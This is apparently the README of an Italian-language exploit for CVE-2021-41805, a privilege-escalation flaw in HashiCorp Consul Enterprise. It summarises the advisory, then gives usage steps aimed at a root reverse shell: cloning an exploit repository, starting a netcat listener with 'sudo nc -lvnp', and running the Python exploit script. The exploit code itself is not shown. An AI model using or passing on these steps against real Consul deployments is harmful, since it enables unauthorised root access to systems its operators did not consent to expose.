
Exploit di HashiCorp Consul con python. (CVE-2021-41805)
HashiCorp Consul Enterprise prima della versione 1.8.17, 1.9.x prima di 1.9.11 e 1.10.x prima di 1.10.4 presenta un controllo di accesso errato. Un token ACL (con i permessi predefiniti operator:write) in un namespace può essere utilizzato per un'escalation di privilegi non intenzionale in un namespace diverso.
CVE_ID : CVE-2021-41805
Punteggio Base : 8.8
Gravità : Alta
Data emissione : 2021-12-12
Versioni interessate: HashiCorp Consul Enterprise prima della versione 1.8.17, 1.9.x prima di 1.9.11 e 1.10.x prima di 1.10.4
https://www.cvedetails.com/cve/CVE-2021-41805/
https://security.netapp.com/advisory/ntap-20211229-0007/
Ottieni una reverse shell e accesso come root.
git clone https://github.com/I-Am-Nelson/CVE-2021-41805.git
cd CVE-2021-41805
Quindi avvia il listener:
sudo nc -lvnp <porta>
Quindi esegui l'exploit:
python3 CVE-2021-41805.py